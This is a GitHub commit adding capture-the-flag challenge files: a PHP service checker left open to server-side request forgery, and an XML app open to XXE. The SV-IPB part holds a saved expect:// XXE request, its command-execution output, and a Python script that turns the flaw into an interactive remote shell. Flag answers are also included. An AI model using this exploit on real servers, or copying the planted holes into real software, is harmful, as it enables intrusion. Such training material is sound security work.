-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
4c74887
commit 49e04c7
Showing
118 changed files
with
3,495 additions
and
0 deletions.
There are no files selected for viewing
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
35 changes: 35 additions & 0 deletions
35
Challenges/Agrihack-0x08/web/final/Ethernal/docker-compose.yml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
version: '3' | ||
|
||
services: | ||
|
||
agrihack: | ||
container_name: ethernal | ||
build: | ||
context: ./ethernal | ||
volumes: | ||
- ./ethernal/src:/var/www/html | ||
ports: | ||
- "15013:80" | ||
networks: | ||
internal_network: | ||
ipv4_address: 10.10.0.4 | ||
|
||
flag: | ||
container_name: ethernal_flag | ||
restart: always | ||
build: | ||
context: ./flag | ||
volumes: | ||
- ./flag/src:/app | ||
networks: | ||
internal_network: | ||
ipv4_address: 10.10.0.5 | ||
expose: | ||
- "80" | ||
|
||
networks: | ||
internal_network: | ||
driver: bridge | ||
ipam: | ||
config: | ||
- subnet: 10.10.0.0/16 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
# cd ethernal && docker compose down | ||
# cd ../flag && docker compose down | ||
docker compose down | ||
docker ps |
5 changes: 5 additions & 0 deletions
5
Challenges/Agrihack-0x08/web/final/Ethernal/ethernal/Dockerfile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
FROM php:apache | ||
RUN apt-get update && apt-get upgrade -y | ||
|
||
COPY src/ /var/www/html/ | ||
EXPOSE 80 |
66 changes: 66 additions & 0 deletions
66
Challenges/Agrihack-0x08/web/final/Ethernal/ethernal/src/index.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,66 @@ | ||
<!DOCTYPE html> | ||
<html lang="en"> | ||
<head> | ||
<meta charset="UTF-8"> | ||
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | ||
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> | ||
<link rel="stylesheet" href="style.css"> | ||
<title>Cek Service Host</title> | ||
</head> | ||
<body> | ||
<div class="container mt-5"> | ||
<h2 class="mb-4">Service Check</h2> | ||
|
||
|
||
<form method="post"> | ||
<div class="form-group"> | ||
<label for="host">Hostname atau IP Address:</label> | ||
<input type="text" class="form-control" id="host" name="host" required> | ||
</div> | ||
<button type="submit" name="submit" class="btn btn-primary">Cek Service</button> | ||
</form> | ||
|
||
<div class="mt-4"> | ||
<?php | ||
$blacklist = ["10.10", "10.10.0.5", "127.0.0.1", "127.0"]; | ||
$issafe = 1; | ||
|
||
if (isset($_POST['submit'])) { | ||
$host = $_POST['host']; | ||
foreach ($blacklist as $word) { | ||
if (stripos($host, $word) !== false) { | ||
echo "no no no..."; | ||
$issafe = 0; | ||
$result = "invalid"; | ||
break; | ||
} else { | ||
$result = checkService($host); | ||
} | ||
} | ||
echo '<div class="alert ' . ($result ? 'alert-success' : 'alert-danger') . '">'; | ||
echo htmlspecialchars($result); | ||
echo '</div>'; | ||
} | ||
?> | ||
|
||
</div> | ||
</div> | ||
|
||
<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> | ||
<script src="https://cdn.jsdelivr.net/npm/@popperjs/[email protected]/dist/umd/popper.min.js"></script> | ||
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> | ||
</body> | ||
</html> | ||
|
||
<?php | ||
function checkService($host) | ||
{ | ||
$ch = curl_init($host); | ||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | ||
$result = curl_exec($ch); | ||
$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); | ||
curl_close($ch); | ||
|
||
return $result; | ||
} | ||
?> |
10 changes: 10 additions & 0 deletions
10
Challenges/Agrihack-0x08/web/final/Ethernal/flag/Dockerfile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
FROM python:3.10-slim-buster | ||
|
||
RUN groupadd -r nobody | ||
|
||
WORKDIR /app | ||
COPY ./src /app | ||
RUN pip3 install --ignore-installed -r requirements.txt | ||
|
||
USER nobody | ||
CMD [ "python3", "-m" , "flask", "run", "--host=0.0.0.0"] |
Binary file added
BIN
+527 Bytes
Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/__pycache__/app.cpython-310.pyc
Binary file not shown.
13 changes: 13 additions & 0 deletions
13
Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/app.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
from flask import Flask, request, render_template, redirect, url_for, render_template_string, jsonify | ||
|
||
app = Flask(__name__) | ||
|
||
@app.route('/flag', methods=['POST']) | ||
def index(): | ||
if request.form.get('flag') == 'show': | ||
return "agrihack{d6723612-b6fa-4f7f-8198-c488765dcbcd}" | ||
else: | ||
return "Invalid request" | ||
|
||
if __name__ == '__main__': | ||
app.run() |
1 change: 1 addition & 0 deletions
1
Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/requirements.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
flask |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
# cd ethernal && docker compose up -d --build | ||
# cd ../flag && docker compose up -d --build | ||
docker compose up -d --build | ||
docker ps |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
FROM ubuntu:trusty | ||
|
||
ENV DEBIAN_FRONTEND noninteractive | ||
|
||
COPY flag /etc/ | ||
COPY --chown=www-data:www-data src /app/ | ||
RUN set -eux; \ | ||
apt-get update; \ | ||
apt-get install -yq \ | ||
grep \ | ||
apache2 \ | ||
libapache2-mod-php5 \ | ||
php5-gd \ | ||
php5-curl \ | ||
php-pear \ | ||
php5-dev \ | ||
libcurl4-openssl-dev \ | ||
expect-dev \ | ||
php5-sqlite \ | ||
php-apc ; \ | ||
pecl install expect; \ | ||
echo "extension=expect.so" >> /etc/php5/apache2/php.ini; \ | ||
rm -rf /var/lib/apt/lists/*; \ | ||
echo "ServerName localhost" >> /etc/apache2/apache2.conf; \ | ||
sed -i "s/variables_order.*/variables_order = \"EGPCS\"/g" /etc/php5/apache2/php.ini; \ | ||
rm -fr /var/www/html && ln -s /app /var/www/html; \ | ||
service apache2 restart | ||
|
||
COPY httpd-foreground /usr/bin/ | ||
RUN chmod 755 /usr/bin/httpd-foreground | ||
|
||
EXPOSE 80 | ||
CMD ["/usr/bin/httpd-foreground"] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
# -*- mode: ruby -*- | ||
# vi: set ft=ruby : | ||
|
||
Vagrant.configure(2) do |config| | ||
config.vm.box = "ubuntu/trusty64" | ||
config.vm.box_check_update = true | ||
|
||
#config.vm.network "forwarded_port", guest: 80, host: 8080 | ||
config.vm.network "private_network", ip: "192.168.33.10" | ||
config.vm.synced_folder "penlab", "/app" | ||
config.vm.provision "shell", inline: <<-SHELL | ||
apt-get update | ||
apt-get install -yq \ | ||
apache2 \ | ||
libapache2-mod-php5 \ | ||
php5-gd \ | ||
php5-curl \ | ||
php-pear \ | ||
php5-dev \ | ||
libcurl4-openssl-dev \ | ||
expect-dev \ | ||
php5-sqlite \ | ||
php-apc && \ | ||
pecl install expect && \ | ||
echo "extension=expect.so" >> /etc/php5/apache2/php.ini && \ | ||
rm -rf /var/lib/apt/lists/* | ||
echo "ServerName localhost" >> /etc/apache2/apache2.conf && \ | ||
sed -i "s/variables_order.*/variables_order = \"EGPCS\"/g" /etc/php5/apache2/php.ini | ||
rm -fr /var/www/html && ln -s /app /var/www/html | ||
chown www-data:www-data /app -R | ||
service apache2 restart | ||
SHELL | ||
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
https://github.com/jbarone/xxelab | ||
https://gist.github.com/joernchen/3623896 | ||
https://airman604.medium.com/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7 | ||
|
27 changes: 27 additions & 0 deletions
27
Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/request_rceeee
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
POST /process.php HTTP/1.1 | ||
Host: 127.0.0.1:5000 | ||
Content-Length: 225 | ||
sec-ch-ua: "Not=A?Brand";v="99", "Chromium";v="118" | ||
sec-ch-ua-platform: "macOS" | ||
sec-ch-ua-mobile: ?0 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 | ||
Content-Type: text/plain;charset=UTF-8 | ||
Accept: */* | ||
Origin: http://127.0.0.1:5000 | ||
Sec-Fetch-Site: same-origin | ||
Sec-Fetch-Mode: cors | ||
Sec-Fetch-Dest: empty | ||
Referer: http://127.0.0.1:5000/ | ||
Accept-Encoding: gzip, deflate, br | ||
Accept-Language: en-US,en;q=0.9 | ||
Connection: close | ||
|
||
<?xml version="1.0" encoding="UTF-8"?> | ||
<!DOCTYPE root [ | ||
<!ENTITY xxe SYSTEM "expect://ls$IFS/$IFS-la">]> | ||
<root> | ||
<name>Joe</name> | ||
<tel>ufgh</tel> | ||
<email>START_&xxe;_END</email> | ||
<password>kjh</password> | ||
</root> |
35 changes: 35 additions & 0 deletions
35
Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/response_rceee
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
HTTP/1.1 200 OK | ||
Date: Thu, 02 Nov 2023 16:13:30 GMT | ||
Server: Apache/2.4.7 (Ubuntu) | ||
X-Powered-By: PHP/5.5.9-1ubuntu4.29 | ||
Vary: Accept-Encoding | ||
Content-Length: 1384 | ||
Connection: close | ||
Content-Type: text/html | ||
|
||
Sorry, START_total 96 | ||
drwxr-xr-x 1 root root 4096 Nov 2 16:05 . | ||
drwxr-xr-x 1 root root 4096 Nov 2 16:05 .. | ||
-rwxr-xr-x 1 root root 0 Nov 2 16:05 .dockerenv | ||
drwxr-xr-x 4 www-data www-data 4096 Nov 2 12:21 app | ||
drwxr-xr-x 1 root root 4096 Nov 2 12:28 bin | ||
drwxr-xr-x 2 root root 4096 Apr 10 2014 boot | ||
drwxr-xr-x 3 root root 4096 Nov 2 12:29 build | ||
drwxr-xr-x 5 root root 360 Nov 2 16:05 dev | ||
drwxr-xr-x 1 root root 4096 Nov 2 16:05 etc | ||
drwxr-xr-x 2 root root 4096 Apr 10 2014 home | ||
drwxr-xr-x 1 root root 4096 Nov 2 12:29 lib | ||
drwxr-xr-x 2 root root 4096 Dec 17 2019 lib64 | ||
drwxr-xr-x 2 root root 4096 Dec 17 2019 media | ||
drwxr-xr-x 2 root root 4096 Apr 10 2014 mnt | ||
drwxr-xr-x 2 root root 4096 Dec 17 2019 opt | ||
dr-xr-xr-x 223 root root 0 Nov 2 16:05 proc | ||
drwx------ 2 root root 4096 Dec 17 2019 root | ||
drwxr-xr-x 1 root root 4096 Nov 2 12:29 run | ||
drwxr-xr-x 1 root root 4096 Mar 25 2021 sbin | ||
drwxr-xr-x 2 root root 4096 Dec 17 2019 srv | ||
dr-xr-xr-x 13 root root 0 Nov 2 16:05 sys | ||
drwxrwxrwt 1 root root 4096 Nov 2 16:05 tmp | ||
drwxr-xr-x 1 root root 4096 Dec 17 2019 usr | ||
drwxr-xr-x 1 root root 4096 Nov 2 12:28 var | ||
_END is already registered! |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
version: '3' | ||
services: | ||
app: | ||
container_name: sv-ipb | ||
build: | ||
context: . | ||
ports: | ||
- "15015:80" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
agrihack{d3pr3c4t3d_xml_l1b_4nd_exp3ct_wr4pp3r_mak3s_xx3_l34d_to_rce} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
#!/bin/sh | ||
set -e | ||
rm -f /run/apache2/apache2.pid | ||
exec /usr/sbin/apache2ctl -DFOREGROUND |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
import re, os, requests | ||
|
||
def rce(cmd): | ||
cmd = cmd.replace(" ", "$IFS") | ||
p = f"""<?xml version="1.0" encoding="UTF-8"?> | ||
<!DOCTYPE foo [<!ENTITY rce SYSTEM "expect://{cmd}"> ]> | ||
<root><username> | ||
&rce;</username><password>asd</password></root> | ||
""" | ||
r = requests.post('http://localhost:15015/process.php', data=p) | ||
pattern = re.compile(r'Sorry,(.*? couldn\'t be registered!)', re.DOTALL) | ||
matches = re.findall(pattern, r.text)[0].replace("couldn't be registered!", "") | ||
|
||
# print(r.text) | ||
print(matches) | ||
|
||
if __name__ == "__main__": | ||
os.system('clear') | ||
while True: | ||
cmd = input('root@ardhani:~$ ') | ||
rce(cmd) |
Binary file not shown.
Oops, something went wrong.